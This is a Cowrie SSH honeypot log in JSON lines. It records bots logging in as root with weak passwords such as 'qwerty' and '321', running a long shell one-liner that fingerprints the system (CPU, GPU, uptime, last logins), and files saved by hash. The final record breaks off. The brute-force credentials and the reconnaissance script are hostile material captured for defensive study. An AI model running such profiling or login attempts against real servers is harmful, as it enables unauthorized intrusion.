{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:05:39.228694Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.login.success","username":"root","password":"321","message":"login attempt [root/321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:05:42.513259Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:05:43.697282Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T09:05:43.698019Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:05:43.698628Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:05:43.699656Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T09:05:43.700799Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:05:43.701612Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:05:43.702323Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T09:05:43.703049Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T09:05:43.703688Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:05:43.704415Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:05:43.705016Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:05:43.705568Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:05:43.706000Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T09:05:44.280105Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:05:44.281037Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:05:44.281891Z","src_ip":"196.251.86.249","session":"73f0c0e52fce"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":35088,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ea6df495c82","protocol":"ssh","message":"New connection: 196.251.86.249:35088 (1.2.3.4:22) [session: 8ea6df495c82]","sensor":"my-vps","timestamp":"2025-08-26T09:06:43.464809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:06:43.929874Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:06:43.982337Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.login.success","username":"root","password":"pass","message":"login attempt [root/pass] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:06:46.154087Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:06:47.489748Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T09:06:47.490441Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:06:47.491271Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T09:06:47.492663Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T09:06:47.493824Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:06:47.494506Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:06:47.496420Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T09:06:47.497728Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T09:06:47.498409Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:06:47.498958Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:06:47.499546Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:06:47.500368Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:06:47.500814Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T09:06:48.446013Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:06:48.446943Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:06:48.448210Z","src_ip":"196.251.86.249","session":"8ea6df495c82"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53252,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbb6bf2330bd","protocol":"ssh","message":"New connection: 217.72.205.35:53252 (1.2.3.4:22) [session: cbb6bf2330bd]","sensor":"my-vps","timestamp":"2025-08-26T09:07:23.855850Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:07:23.857018Z","src_ip":"217.72.205.35","session":"cbb6bf2330bd"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":42442,"dst_ip":"1.2.3.4","dst_port":22,"session":"05ee1e2a454a","protocol":"ssh","message":"New connection: 45.88.8.215:42442 (1.2.3.4:22) [session: 05ee1e2a454a]","sensor":"my-vps","timestamp":"2025-08-26T09:07:25.509442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:07:25.824843Z","src_ip":"45.88.8.215","session":"05ee1e2a454a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T09:07:25.826732Z","src_ip":"45.88.8.215","session":"05ee1e2a454a"}
{"eventid":"cowrie.login.success","username":"root","password":"Lohit@123","message":"login attempt [root/Lohit@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:07:27.436943Z","src_ip":"45.88.8.215","session":"05ee1e2a454a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:07:27.842251Z","src_ip":"45.88.8.215","session":"05ee1e2a454a"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":39024,"dst_ip":"1.2.3.4","dst_port":22,"session":"85ba826ae5a0","protocol":"ssh","message":"New connection: 196.251.86.249:39024 (1.2.3.4:22) [session: 85ba826ae5a0]","sensor":"my-vps","timestamp":"2025-08-26T09:07:47.253700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:07:47.810053Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:07:47.811134Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:07:51.236378Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:07:52.664058Z","src_ip":"196.251.86.249","session":"85ba826ae5a0"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" 